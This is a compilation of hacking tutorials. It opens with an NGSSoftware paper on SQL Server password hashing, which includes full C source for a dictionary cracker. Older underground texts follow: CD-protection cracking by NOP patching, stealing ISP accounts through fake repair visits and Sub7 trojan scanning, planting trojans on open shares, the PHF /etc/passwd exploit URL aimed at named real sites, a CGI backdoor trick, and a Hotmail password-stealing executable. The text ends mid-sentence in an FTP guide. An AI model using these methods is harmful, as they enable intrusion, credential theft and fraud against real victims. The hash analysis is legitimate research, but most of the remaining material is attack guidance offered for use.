retrieve sql password

NGSSoftware Insight Security Research How does SQL Server store passwords?
SQL Server uses an undocumented function, pwdencrypt() to produce a hash of the user's password, which is stored in the sysxlogins table of the master database. This is probably a fairly common known fact. What has not been published yet are the details of the pwdencrypt() function. This paper will discuss the function in detail and show some weaknesses in the way SQL Server stores the password hash. In fact, as we shall see, later on I should be saying, 'password hashes'.
What does an SQL password hash look like?
Using Query Analyzer, or the SQL tool of your choice, run the following query
select password from master.dbo.sysxlogins where name='sa'
You should get something that looks similar to the following returned.
0x01008D504D65431D6F8AA7AED333590D7DB1863CBFC98186BFAE06EB6B327EFA5449E6F649BA954AFF4057056D9B
This is the hash of the 'sa' login's password on my machine.
What can we derive from pwdencrypt() about the hash?
Time
The query
select pwdencrypt('foo')
produces
0x0100544115053E881CA272490C324ECE22BF17DAF2AB96B1DC9A7EAB644BD218969D09FFB97F5035CF7142521576
but several seconds later repeating the query
select pwdencrypt('foo')
produces
0x0100D741861463DFFF7B5282BF4E5925057249C61A696ACB92F532819DC22ED6BE374591FAAF6C38A2EADAA57FDF
The two hashes are different and yet the input, ‘foo’, is the same. From this we can deduce that time must play an important part in the way password hashes are created and stored. The design reasons behind this will be such that if two people use the same password then their hashes will be different - thus disguising the fact that their passwords are the same.
2 NGSSoftware Insight Security Research
Case
Run the query
select pwdencrypt('AAAAAA')
which produces
0x01008444930543174C59CC918D34B6A12C9CC9EF99C4769F819B43174C59CC918D34B6A12C9CC9EF99C4769F819B
Now, we can note that there are probably two password hashes here. If you can't spot it immediately let me break it down
0x0100
84449305
43174C59CC918D34B6A12C9CC9EF99C4769F819B
43174C59CC918D34B6A12C9CC9EF99C4769F819B
As can be seen, the last 40 characters are the same as the penultimate 40 characters. This suggests that passwords are stores twice. One of them is the normal case sensitive password and the other is the upper-cased version of the password. This is not good as any one attempting to crack SQL passwords now has an easier job. Rather than having to break a case sensitive password they need only go after the upper-cased version. This reduces the number of characters they need to attempt considerably.
Clear Salt
From what we know already, that changes in time will produce a change in the hash, there must be something about time that makes the password hashes different and this information must be readily available so when someone attempts to login a comparison can be performed against the hash derived from the password they supply and the hash stored in the database. In the breakdown of results from pwdencrypt() above the 84449305 portion is this piece of information.
This number is derived in the following fashion. The time () C function is called and used as a seed passed to the srand() function. srand() sets a start point to be used for producing a series of (pseudo)random numbers. Once srand is seeded the rand() function is called to produce a pseudo random number. This number is an integer; however SQL server converts this to a short and sets it aside. Lets call this number SN1. The rand() function is called again producing another pseudo random integer which, again, is converted into a short. Let's call this number SN2. SN1 and SN2 are joined to produce an integer. SN1 becoming the most significant part and SN2 the least significant part : SN1:SN2 to produce a salt. This salt is then used to obscure the password.
Hashing the password
The user's password is converted to it's UNICODE version if not already in this form. The salt is then appended to the end. This is then passed to the crypt functions in advapi32.dll to produce a hash using the secure hashing algorithm or SHA. The password is then converted to its upper case form, the salt tacked onto the end and another SHA hash is produced.
0x0100 Constant Header
84449305 Salt from two calls to rand()
43174C59CC918D34B6A12C9CC9EF99C4769F819B Case Sensitive SHA Hash
43174C59CC918D34B6A12C9CC9EF99C4769F819B Upper Case SHA Hash
3 NGSSoftware Insight Security Research
The Authentication Process
When a user attempts to authenticate to SQL Server several things happen to do this. Firstly SQL Server examines the password entry for this user in the database and extracts the "salt" - 84449305 - in the example. This is then appended to the password the user supplies when attempting to log in and a SHA hash is produced. This hash is compared with the hash in the database and if they match the user is authenticated - and of course if the compare fails then the login attempt fails.
SQL Server Password Auditing
This is done in the same manner that SQL Server attempts to authenticate users. Of course, by far the best thing to do is, first off, is attempt to brute force the hash produced from the upper-cased version. Once this has been guessed then it is trivial to workout the case sensitive password.
Source Code for a simple command line dictionary attack tool
/////////////////////////////////////////////////////////////////////////////////
//
// SQLCrackCl
//
// This will perform a dictionary attack against the
// upper-cased hash for a password. Once this
// has been discovered try all case variant to work
// out the case sensitive password.
//
// This code was written by David Litchfield to
// demonstrate how Microsoft SQL Server 2000
// passwords can be attacked. This can be
// optimized considerably by not using the CryptoAPI.
//
// (Compile with VC++ and link with advapi32.lib
// Ensure the Platform SDK has been installed, too!)
//
//////////////////////////////////////////////////////////////////////////////////
#include
#include
#include
FILE *fd=NULL;
char *lerr = "\nLength Error!\n";
int wd=0;
int OpenPasswordFile(char *pwdfile);
int CrackPassword(char *hash);
int main(int argc, char *argv[])
{
int err = 0;
4 NGSSoftware Insight Security Research
if(argc !=3)
{
printf("\n\n*** SQLCrack *** \n\n");
printf("C:\\>%s hash passwd-file\n\n",argv[0]);
printf("David Litchfield (david@ngssoftware.com)\n");
printf("24th June 2002\n");
return 0;
}
err = OpenPasswordFile(argv[2]);
if(err !=0)
{
return printf("\nThere was an error opening the password file %s\n",argv[2]);
}
err = CrackPassword(argv[1]);
fclose(fd);
printf("\n\n%d",wd);
return 0;
}
int OpenPasswordFile(char *pwdfile)
{
fd = fopen(pwdfile,"r");
if(fd)
return 0;
else
return 1;
}
int CrackPassword(char *hash)
{
char phash[100]="";
char pheader[8]="";
char pkey[12]="";
char pnorm[44]="";
char pucase[44]="";
char pucfirst[8]="";
char wttf[44]="";
char uwttf[100]="";
char *wp=NULL;
char *ptr=NULL;
int cnt = 0;
int count = 0;
unsigned int key=0;
unsigned int t=0;
unsigned int address = 0;
unsigned char cmp=0;
unsigned char x=0;
HCRYPTPROV hProv=0;
HCRYPTHASH hHash;
5 NGSSoftware Insight Security Research
DWORD hl=100;
unsigned char szhash[100]="";
int len=0;
if(strlen(hash) !=94)
{
return printf("\nThe password hash is too short!\n");
}
if(hash[0]==0x30 && (hash[1]== 'x' hash[1] == 'X'))
{
hash = hash + 2;
strncpy(pheader,hash,4);
printf("\nHeader\t\t: %s",pheader);
if(strlen(pheader)!=4)
return printf("%s",lerr);
hash = hash + 4;
strncpy(pkey,hash,8);
printf("\nRand key\t: %s",pkey);
if(strlen(pkey)!=8)
return printf("%s",lerr);
hash = hash + 8;
strncpy(pnorm,hash,40);
printf("\nNormal\t\t: %s",pnorm);
if(strlen(pnorm)!=40)
return printf("%s",lerr);
hash = hash + 40;
strncpy(pucase,hash,40);
printf("\nUpper Case\t: %s",pucase);
if(strlen(pucase)!=40)
return printf("%s",lerr);
strncpy(pucfirst,pucase,2);
sscanf(pucfirst,"%x",&cmp);
}
else
{
return printf("The password hash has an invalid format!\n");
}
printf("\n\n Trying...\n");
if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL ,0))
{
if(GetLastError()==NTE_BAD_KEYSET)
{
// KeySet does not exist. So create a new keyset
if(!CryptAcquireContext(&hProv,
6 NGSSoftware Insight Security Research
NULL,
NULL,
PROV_RSA_FULL,
CRYPT_NEWKEYSET ))
{
printf("FAILLLLLLL!!!");
return FALSE;
}
}
}
while(1)
{
// get a word to try from the file
ZeroMemory(wttf,44);
if(!fgets(wttf,40,fd))
return printf("\nEnd of password file. Didn't find the password.\n");
wd++;
len = strlen(wttf);
wttf[len-1]=0x00;
ZeroMemory(uwttf,84);
// Convert the word to UNICODE
while(count < len)
{
uwttf[cnt]=wttf[count];
cnt++;
uwttf[cnt]=0x00;
count++;
cnt++;
}
len --;
wp = &uwttf;
sscanf(pkey,"%x",&key);
cnt = cnt - 2;
// Append the random stuff to the end of
// the uppercase unicode password
t = key >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 8;
t = t >> 24;
7 NGSSoftware Insight Security Research
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 16;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 24;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
// Create the hash
if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash))
{
printf("Error %x during CryptCreatHash!\n", GetLastError());
return 0;
}
if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))
{
printf("Error %x during CryptHashData!\n", GetLastError());
return FALSE;
}
CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);
// Test the first byte only. Much quicker.
if(szhash[0] == cmp)
{
// If first byte matches try the rest
ptr = pucase;
cnt = 1;
while(cnt < 20)
{
ptr = ptr + 2;
strncpy(pucfirst,ptr,2);
sscanf(pucfirst,"%x",&cmp);
if(szhash[cnt]==cmp)
cnt ++;
else
{
break;
}
}
if(cnt == 20)
{
8 NGSSoftware Insight Security Research
// We've found the password
printf("\nA MATCH!!! Password is %s\n",wttf);
return 0;
}
}
count = 0;
cnt=0;
}
return 0;
}
Read more

HOW TO CRACK ANY TYPE OF SOFTWARE PROTECTION

In this tutorial you will learn how to crack any type of software protection using W32Dasm and HIEW.

IDENTIFYING THE PROTECTION:
Run the program, game, etc., (SoftwareX) that you want to crack without the CD in the CD reader. SoftwareX will not run of course, however, when the error window pops up it will give you all of the vital information that you need to crack the program, so be sure to write down what it says.

CRACKING THE PROTECTION:
Now, run Win32Dasm. On the file menu open DISASSEMBLER > OPEN FILE TO DISASSEMBLE. Select SoftwareX’s executable file in the popup window that will appear (e.g. SoftwareX.exe). W32Dasm may take several minutes to disassemble the file.

When W32Dasm finishes disassembling the file it will display unrecognizable text; this is what we want. Click on the String Data References button. Scroll through the String Data Items until you find SoftwareX’s error message. When you locate it, double click the error message and then close the window to return to the Win32Dasm text. You will notice that you have been moved somewhere within the SoftwareX’s check routine; this is where the error message in generated.

Now comes the difficult part, so be careful. To crack SoftwareX’s protection you must know the @offset of every call and jump command. Write down every call and jump @offset number that you see (You have to be sure, that the OPBAR change its used color to green). You need the number behind the @offset without the “h.”

Now open HIEW, locate SoftwareX’s executable, and press the F4 key. At this point a popup window will appear with 3 options: Text, Hex, and Decode. Click on “Decode” to see a list of numbers. Now press the F5 key and enter the number that was extracted using Win32Dasm. After you have entered the number you will be taken to SoftwareX’s check routine within HIEW.

To continue you must understand this paragraph. If the command that you are taken to is E92BF9BF74, for example, it means that the command equals 5 bytes. Every 2 digits equal one byte: E9-2B-F9-BF-74 => 10 digits => 5 bytes. If you understood this then you can continue.

Press F3 (Edit), this will allow you to edit the 10 digits. Replace the 5 bytes with the digits 90. In other words, E92BF9BF74 will become 9090909090 (90-90-90-90-90). After you complete this step press the F10 key to exit.

Congratulations! You just cracked SoftwareX!

Don’t panic if SoftwareX will not run after you finished cracking it. It only means that something was done incorrectly, or perhaps SoftwareX’s protection technology has been improved or created after this tutorial. Simply reinstall SoftwareX and start over. If you’re sure that you completed all steps correctly and the program still will not run, then tough nuts. Their protection was developed after the writing of this tutorial.
Read more

Stealing ISP Accounts

Stealing ISP Accounts




Why would you want a stolen ISP account u ask?? well there are two reasons, you are too poor to afford the local phone companies bull shit prices or you need an easier and faster platform to hack from than five proxies and three wingates, well here is your answer. Remember there is no point in going out and hacking your local ISP to get an account, the easier the better is my suggestion.

Now firstly you may be reading this at school or from somewhere and you dont have access at home so now i will show you some of the method's i have used to gain accounts. One of the most simple method's is to go to a local shop and find a computer on dialup access, then simply run a password snatcher on it such as WASP and then emailing all the information outside where you can proccess it, this method is relatively simple and if you get caught they just chuck you out of the store. These accounts are normally only good for night access, we want 24/7 access. One method i have found works is ringing up the local ISP and asking to purchase an account, say you are in a rush but make sure you dont sound fake, they normally say "here is your internet username and password, we will send out the information for you to send back blah blah blah..." now ofcourse you have to make sure you call without Caller ID active, if you live in australia just prefix your number with 1831. This method can be rather annoying and normally doesnt work, but it is worth a try and the account normally last's for a few weeks. My favourite method is one of great effort but also great reward, find a local computer store that is overpriced and offers all that extended warranty crap, now get yourself a shit and screen print their logo on it, now get a list of people who purchase computers from there, or just follow people home. Now that we have five or six people who are stupid enough to pay 600% of the price for a computer than they should, go around there houses and pose as a computer repair guy sent out from the store, say something like, this is part of the extended life warranty you purchased with your computer, we are just performing a regular checkup as we have had a few problems with your model of computer. nine times out of ten they will let you straight through the door without even asking any questions to do with abacus, just the mere thought of their overpriced piece of crap not working makes them do whatever you want, now when you are in just run a program through there computer and snatch there internet accounts, it doesnt matter who they are for, just the we will get more later with these ones. Make sure you stay for an hour or so and run scandisk and defrag to make it look real. Now unless you are really stupid you should have around five or six internet accounts.

Now when you dial up to them make sure you turn of Caller ID, this is what stop's you from being pinned straight away, check the person's email and remove any multiple logging reports and make sure you change internet accounts ATLEAST once a week and never use the old one again, give it to some lamer over the net and let them get in trouble for your hack's. You should be on the net by now, but to change accounts once a week we really need more accounts, i hate to say it but the easiest way to get more accounts in by using winblows, so fire up winblows and ignore all the illegal operation crap and download the following program's:

Legion - Open Share Scanner
Sub 7 Defcon edition
Sub 7 2.2
mIRC


Now open up mIRC and go to a local area's channel, /whois a few people until you find the isp you like.

Infinity is
freestyler@12-237-182-191.client.attbi.com * BoMFunk Mc'S

So we have made our choice, attbi.com reveal ATT&T, now do a /dns on 12-237-182-191.client.attbi.com as this is his host.

*** Resolved 12-237-182-191.client.attbi.com to 12.237.182.191

Now convert this into a class B network and we have 12.237.0.0, this is our target, open up Sub 7 2.2 and goto Connection > Scanner > Local Scanner. Put the Start ip as 12.237.0.0 and the end ip as 12.237.255.255, then click scan. This will take quite a while, now when you get a result open up Sub 7 Defcon and put it in the field up the top and click connect. If you get asked for a password then dont bother with this IP, but if it comes up with connected at the bottom we are in business. First thing you should do is goto Advanced > Passwords > Retrieve RAS Passwords, this is there internet username and password aswell as phone number, make sure you get you local phone number from the ISP's site. Next goto Connection > Server Options and set a password, we dont want other people getting on the net while we are hacking and kicking us off. Turn on IP Notify aswell so that you can get this server to do remote scan's for you if needed, ISP's sometimes check for people who scan and bust their ass.

To anyone who says using Sub 7 is a lame way to get accounts, i agree but i would rather this way than hacking my local ISP and getting put in jail before i even get to my target. You ask why you use Sub 7 2.2 just for scanning?? well its a better scanner than Defcon, but it doesnt allow IRC bot's or IP Notify.

The Next way to gain accounts is to find open shares and upload a trojan. To do this open up legion scanner and do a scan of the same range as you did with sub 7, expect do it in small ammounts like 203.48.0.0 - 203.48.5.255,when it comes up with a result go into my computer and change the address to \\ and then the ip, so for example
\\203.48.15.123 then wait for it to load, you might get asked for a password, if so ignore this ip and continue scanning, if you dont get a password, have a look at the names, look for the C drive if it is there and go into it, then go into windows > start menu > programs > startup, and paste a trojan server in here, make sure it doesnt come up with a prompt and that it will notify you when they get on the net next. All you have to do now is wait, within a few day's you should be able to get atleast 20-30 accounts, if not around 50. This should last for a long time and you can do anything you want with them. Just remember to disable Caller ID and to change accoutns every week atleast.

DO NOT fuck with the person you get the account from, keep your stealth and dont advertise the fact you dont pay for internet, or the fact you hack from other peoples accounts.

Greetz go out to jimmyj, Opticon, harper, Dead_Beat, Digicrime, Zaleth, Sangoma and everyone i forgot...
Read more

-***Hacking Web Pages***-

Introduction Please know that hacking webpages is consitered lame in many's opinions, and it will most likly not give you a good reputation. People can always check logs once notified of hacking and most likly your address will come up and then at worst they will press charges for some elaborate computer crimes law and you willgoto prison for up to 10 years and owe alot of $. So please attempt to refrain from abusing your knowlage on this subject. This is for informational purposesonly.
"Free" Web Pages
Free webpages is web page hosting companieslike Tripod and Geocities that host peoples web pagesfor free and make money off advertising. There is waysto hack these companies and have access to all users,but it would be to complex for most people. This way is simply social engineering which is not very hard todo, so don't proclaim yourself an Uberhacker because you vandalised a poor guy's webpage, who just happened to have his information on his site. All you have to dois set up an account with a free email service like hotmail and find your target. On your targets page up need to have the date of birth, name, and their old email, or instead of the DOB there address (I have lostmy pass to a smaller company, and they needed the address i had registered with). All these free web pagecompanies have their "verification" for people who havelost there password to their page. All their is to it is once you have this information is you either email the company telling them you changed your email addressand once that is done wait about 2 weeks and then emailthem again saying that you lost your password. Most willemail you telling you that you need some sort of verification, like the DOB or Address. In which you email them back and tell them and get a new password. On the other hand, companies like Geocities are too busy for email so they have set up a web site where members can get there password back (
http://www.geocities.com/help/pass_form.html).
User's Pages
There is many different methods of hacking usersweb pages on a server. I will attempt to list as manyways possible but don't expect very much in depth information. Getting Passwords Okay suppose you found a page you want to hack, that is on someone elses server thats a basic server, light security. Okay very light security. I will be truthful. This pretty much works on servers with no security [=.Getting a passwd file is pretty easy. Simply telnet into the servers FTP anonymously and look in the ETC directory and get the file called Passwd.Another way to get them is to find your target and in a WWW browser type cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd after the servers name. For example the name may be
http://www.hackme.com/, you would gotohttp://www.hackme.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd except instead of www.hackme.com you would replace that with your targets URL.You may get a passwd file that has no user accounds,but only defaults which where the encrypted password should be a * would be in its place. On certain serverswith this you may have a shadowed passwd but on all passwd files i have come across there is some user names like FTP and NEWS that have no encrypted passwordswhich is replaced with *. If you find only this and noencrypted passwds you probably have found a fixed passwd file and you must try another method of hackingthe server. You need to examine this file and look for a line in the text that looks like this:rrc:uXDg04UkZgWOQ:201:4:Richard Clark:/export/home/rrc:/bin/kshdoes not need to look exactly like that, the only important part it needs it the uXDg04UkZgWOQ and rcc, which is the login part. Get a program called John the Ripper whcih can be found on any hacking site on the web. If you are to lazy, or stupid to find one on the web heres a good place to go for newbies http://www.hackersclub.com/km/I will not go in depth right here on passwd files, but ihave written a text on passwd's going good into the subject which can be found at http://www.xtalwind.net/~lmclaulin/ugpasswd.txt.Anyway, using John the Ripper is easy, if you want toquickly hack something give the command (in DOS prompt)"john passwd -single" Replace "passwd" in there withthe name of the passwd file, you may have saved it as passwd.txt or something. An important thing to rememberis that the passwd file needs to be in the same directory as John. To see a list of other methods for cracking a passwd file, just type John and it will giveyou a list of commands. I have found john won't workfor me with wordlists but other people say that it works fine for them. You can use incremental mode (to use that the command is "John passwd -incremental"It takes like a few days to finish so I wouldn't reallywant it to let it go on forever and ever if it was just some normal passwd file. Unless its like NASA's passwd file (keep dreaming, they probably change passwords everyday and that file is very outdated)I wouldn't want to use that too much. To see a complete list of John's cracking capabilities, justtype john and it will give you a list of commands that you may use.

If you Have an Account with the Users Server
The next section is on how you can hack a webpage ifyou already have an account with the server.
This was taken from a text by Lord Somer and since i don't want to butcher something important out of it I will just keep the text in its whole form. Exploiting Net Adminstration CGI (taken from a text by Lord Somer) ####################################### # Exploiting Net Administration Cgi's # # like nethosting.com # # Written by:Lord Somer # # Date:9/2/97 # #######################################
Well since nethosting.com either shutdown or whatever I figured what the hell before I forgethow I did the more recent hacks etc... I'd tell you how so maybe you'll find the same sys elsewhere or be able to use it for ideas.
Basically Nethosting.com did all it's administration via cgi's at net-admin.nethosting.com,well you need an account, card it if necessary, log in to net-administration, you'll see craplike ftp administration, email, etc... who really cares about e-mail so we'll go to ftp.Click on ftp administration. Lets say you were logged in as 7thsphere.com your url would be something like:
http://net-admin.nethosting.com/cgi-bin/add_ftp.cgi?7thsphere.com+ljad32432jl
Just change the 7thsphere.com to any domain on the sys or if in the chmod cgi just del that partbut keep the + sign and you edit the /usr/home dir. In the ftp administration make a backdooraccount to that domain by creating an ftp who's dir is / since multiple /// still means /.
Once you have your backdoor have fun. Oh yeah and in the email you can add aliases like I didto rhad's e-mail account at 7thsphere, why the hell is he on that winsock2.2 mailing list?
Well the basic theory of this type of exploitation is that:- the cgi is passed a paramater which we change to something else to edit it's info- since it uses the stuff after the + to check that it's a valid logged in account(like hotmail does), it dosen't check the password again.- multiple ///'s in unix just mean a /, thus we can get access to people's dir or the entire /usr/home dir
I used this method for hacking a few well known places:7thsphere.comsinnerz.comhawkee.comwarez950.orglgn.comand several other unknown sites.
Please remember if you ever use a method of mine please credit me and link to my site thanks.
######################################### Contact Info: ## E-mail:
webmaster@lordsomer.com ## ICQ: 1182699 ## Site: The Hackers Layer ## http://www.lordsomer.com ## Other Sites: ## Hackers Club ## http://www.hackersclub.com/km #########################################
Other Ways Of Hacking User Pages
Another method that may work with really stupid Admins is sometimes, when you FTP to a server, you can leave your home directory and go back a few directoriesand find your targets directory. Once you have done that if you can access the HTML files and save them to disk and then "edit them". The HTML files may or may not be stored on FTP but with smarter admins they are not accessable by other users.
Things that Don't Fit In Other Catagories
There are many more ways of hacking web pages. Peoples stupidity is a good way. Many passwords are guessable if they are not hackable. Its not hacking but simply using a persons stupidity. If you were to get root on a server you could have access to everything on the server, so if you wanted to hack a servers webpage (or access anything else you want onthe server) you would probably have to get an account and you could run an exploit on the server, but that is something newbies should probably not try until youknow more about what you are doing.
Why Hacking Web Pages (and other things) is aBad Idea...
Hacking web pages is an obvious signal that someone has hacked your server, which can reminer to forgetful admins to check there logs and immediatly callyour ISP to cancel your account along with the FBI to come bust you on some elaborate computer crime law. Hacking school grades is another stupid thing you shouldnever do. I know its off topic but its important to remember, because they are two things that both get people busted alot. Don't believe me? Let me show you afew pieces of articles from news at the hackersclub. The entire article (instead of the parts where the hacker got busted) may be read from the address beneath each section.
"Kubojima is accused of taking over seven web pages of theOsaka-based television network Asahi Broadcasting Company on May18 and replacing five of the seven weather charts on the pages withpornographic pictures. He also faces charges under Japan's anti-obscenity laws.
If convicted, Kubojima faces a fine of one million yen ($8,600) and a prison term of up to five years under tough penalties against hackers adopted in 1992. "
http://web5.hackersclub.com/km/news/1997/may/news4.txt
"He is 18, and may be looking at up to 10 years in prison. He hasn't stolen anything, he hasn't hurt anybody and many familiarwith the crime that he is accused of committing say the possiblepunishment borders on the absurd.
The 18-year-old and a 17-year-old friend, police say, broke into a computer network.
They added some funny pictures to a World Wide Web site run bythe network operator, a Texas Internet service provider calledFlashNet, police say. The two figured out some of the user names andpasswords used by FlashNet customers.
Then they left.
The 18-year-old was arrested on suspicion of third-degree feloniesthat carry a sentence of two to 10 years in prison and a fine of up to$10,000. His friend, who was arrested on suspicion of a less severemisdemeanor, faces up to a year in jail and a $4,000 fine. "
http://web6.hackersclub.com/km/news/1997/august/news3.txt
"Student faces felony for hacking grades
>From NewsTalk 750 WSB
A 15-year-old Florida High School student faces felony charges for allegedly hacking his way into the school computer to change "F's" into "A's." Jason Westerman claims it was only a joke, but he faces felony charges for offenses against intellectual property and computer users. He's been suspended for ten days. Westwood high school administrators want to expel him. "
http://web6.hackersclub.com/km/news/1997/june/news4.txt
Getting busted hacking will not be a fun process unless you like paying $10,000 and having a date with someone names Spike in the prison's cafateria for the next 3 years. Be wise about what you leave behind, because soon you may be suprised by a knock at the doorby your neighborly FBI agent.
Read more

Hacking Servers

Hacking Servers:

I am asked at least 5 or more times a day by young, beginning"hackers", "How can I hack?" or "Is there a way to hack a web site?"Well there is. There are, in fact, literally hundreds of ways to do this. Iwill discuss a few in this text to get you started. Every hacker has to startsomehow and hacking web servers and ftp servers is one of the easiest ways.If you are reading this I am assuming that you already have a basic knowledgeof how web servers work and how to use some form of UNIX. But I am going toexplain that stuff anyway for those of you who don't know.

Part 1: Simple UNIX Commands
Most DOS commands have UNIX and Linux equivalents. Listed below aresome of the main commands you will need to know to use a shell account.
HELP = HELPCOPY = CPMOVE = MVDIR = LSDEL = RMCD = CD
To see who else is on the system you can type WHO. To get informationabout a specific user on the system type FINGER . Using those basicUNIX commands you can learn all you need to know about the system you areusing.
Part 2: Cracking Passwords
On UNIX systems the file that contains the passwords for all the userson the system is located in the /etc directory. The filename is passwd. I betyour thinking...."Great. All I have to do is get the file called /etc/passwdand I'll be a hacker." If that is what you are thinking then you are deadwrong. All the accounts in the passwd file have encrypted passwords. Thesepasswords are one-way encrypted which means that there is no way to decryptthem. However, there are programs that can be used to obtain passwords fromthe file. The name of the program that I have found to be the best passwordcracker is called "Cracker Jack." This program uses a dictionary file composedof thousands of words. It compares the encrypted forms of the words in thelist to the encrypted passwords in the passwd file and it notifies you whenit finds a match. Cracker Jack can be found at my web site which is at
http://www.geocities.com/SiliconValley/9185 Some wordlists can be found at the following ftp site: sable.ox.ac.uk/pub/wordlists. To get to the wordlist that I usually use goto that ftp sitethen goto the American directory. Once you are there download the file calleddic-0294.tar.Z which is about 4 MB. To use that file it must be uncompressedusing a program like Gzip for DOS or Winzip for Windows. After uncompressingthe file it should be a text file around 8 MB and it is best to put it in thesame directory as your cracking program. To find out how to use Cracker Jackjust read the documentation that is included with it.
Part 3: The Hard Part (Finding Password Files)
Up till now I have been telling you the easy parts of hacking aserver. Now we get to the more difficult part. It's common sense. If thesystem administrator has a file that has passwords for everyone on his or hersystem they are not going to just give it to you. You have to have a way toretrieve the /etc/passwd file without logging into the system. There are 2simple ways that this can sometimes be accomplished. Often the /etc directoryis not blocked from FTP. To get the passwd file this way try using an FTPclient to access the site anonymously then check the /etc directory to see ifaccess to the passwd file is restricted. If it is not restricted then downloadthe file and run Cracker Jack on it. If it is restricted then try plan B. Onsome systems there is a file called PHF in the /cgi-bin directory. If thereis then you are in luck. PHF allows users to gain remote access to files(including the /etc/passwd file) over the world wide web. To try this methodgoto your web browser and type in this URL:
http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwdThen substitute the site you are trying to hack for the xxx.xxx.xxx.For example, if I wanted to hack St. Louis University (and I have already) Iwould type in http://www.slu.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Don't bother trying www.slu.edu because I have already done it and told themabout their security flaw.Here's a hint: try www.spawn.com and www.garply.com
If the preceding to methods fail then try any way you can think of to get thatfile. If you do get the file and all the items in the second field are X or !or * then the password file is shadowed. Shadowing is just a method of addingextra security to prevent hackers and other unwanted people from using thepassword file. Unfortunately there is no way to "unshadow" a password filebut sometimes there are backup password files that aren't shadowed. Trylooking for files such as /etc/shadow and other stuff like that.
Part 4: Logging In To "Your" New Shell
OK....This is where you use what you found using Cracker Jack.Usernames and passwords. Run your telnet client and telent to the server thatyou cracked the passwords for, such as
www.slu.edu. When you are connected itwill give a login screen that asks for a login names and password and usuallyinformation on the operating system that the server is using (usually UNIX,linux, aix, irix, ultrix, bsd, or sometimes even DOS or Vax / Vms). Just typein the information you got after cracking the passwd file and whatever youknow about UNIX to do whatever you feel like doing. But remember that hackingisn't spreading viruses or causing damage to other computer systems. It isusing your knowledge to increase your knowledge.
Part 5: Newbie Info
If you feel that you have what it takes to be a serious hacker thenyou must first know a clear definition of hacking and how to be an ethicalhacker. Become familiar with unix environments and if you are only juststarting to learn to hack, visit a local library and find some books onvarious operating systems on the internet and how they work. Or you could goto a book store and buy a couple internet security books. They often explainhow hackers penetrate systems and that is something a beginner could use asan advantage.
Read more

Hacking Hotmail

Hacking Hotmail
This article directly aims at exploiting a security vulnerability in msn messenger which lets a hacker to steal out hotmail password of a victim just by using some system registry information and making a simple keylogger program in any language like C or Visual basic.Before continuing I want you to think twice for execution of this method since it is direct hacking so you may be in trouble if caught.But as we people follow the principle of "NEVER GET CAUGHT" so what to think if you are a hacker J JPlease note that hacking hotmail according to this article involves the need of a executable (.exe) file which is available along with this file.Hacking hotmail through msn messenger using the trick file is the easiest one.It does not involves any complecated stuff of entering deep into the scripts or downloading the password file and then going for decryption using cracker programs.All you need to do is to send victim the trick file through msn messenger.When the victim executes the file its will show a fake out of memory error.Then just type in the following command;" ^ ^ " (without quotation sign.. only ^ ^ )
"space^space^space" (hope u got it) (without quotation mark)This command will log out the victim from msn messenger.When the victim logs back in just type anything and send to the victim through messenger and you will get the username and password of the victim.
AINT IT COOL.. This method is particularly intended for newbies.Guys experienced to hacking wont be busted by this method.I guess they wont run the file. If the victim doesn't run the file then this method wont work.
Read more

FTP Hacking


Disclaimer==========We do not encourage any kinds of illegal activities. If you believe that breaking the law is a good way to impress someone, please stop reading now and grow up. There is nothing impressive or cool in being a criminal.
Contents========What Is FTP and What Is It Good For?* What does the acronym FTP stands for?* What can I do with FTPs anyway? What are they good for anyway?FTP Commands* How to use FTP with raw FTP commands* How to use FTP with a GUI (Graphical User Interface) / text client(5)FTP Hacking* Finding out information about your target and finding security holes using that info* Example FTP-related security holesThe Stupid Bug Corner* An "elite" bugNewbies Corner* What is a protocol* What is a port* What is a mirror site* What is a path (complete path + relative path)* What is a client program and what is a server program* How to find information about remote hosts* What is a daemon* What is root* What is a core dump* What is a DoS attack* What is DUN* What is an ISP* What is flamingOther Tutorials* FTP Hacking.* Overclocking.* Ad and Spam Blocking.* Sendmail.* Phreaking.* Advanced Phreaking.* Phreaking II.* IRC Warfare.* Windows Registry.* Info Gathering.* Proxy/Wingate/SOCKS.* Offline Windows Security.* ICQ Security.
Bibliography
What Is FTP and What Is It Good For?------------------------------------The word FTP (see footnote 1 below) stands for File Transfer Protocol(1).FTP servers will let you to both download (retrieve a file from the server) and upload (send a file to the server) files from the server with great ease (if you have permission to do so).You browse through a remote FTP site the same way you browse through your own computer's files and directories (of course, you don't have read and/or write access to every file on the system, and some files you can't even see).
FTP Commands------------The following are several basic FTP commands. To communicate with FTP daemons(7), connect to port(2) 21 and then use the following commands (see footnote 2 below) to communicate with the FTP server:cd change directory (on the server)lcd change local directory (when sending a file, the path(4) of the specified file will be the path you specify on lcd)dir,ls directory listingbinary change mode to binary transferget retrieve a filemget retrieve many filesput send a filemput send many filespwd print working directory on the server
Footnotes+++++++++1. For thousands of computer-related acronyms and abbreviations head to blacksun.box.sk and download the file called acros.txt from the projects page.2. If you don't feel like typing stupid commands, there are lots of FTP clients(5) who will do all the work for you, but fortunately some will still show you all the commands they use so you'll be able to learn new commands.You can download FTP clients for every Operating System from TUCOWS. Simply go to the nearest TUCOWS mirror site(3) or go directly to
www.tucows.com.
FTP Hacking-----------Since there are so many FTP holes for so many FTP server programs and so many Operating Systems, I decided that the best way it simply to explain to you how to find information about security holes by yourself.I will also introduce several interesting FTP security holes near the end of this section.To find FTP exploits, try searching the following websites (or join the BugTraq mailing list at
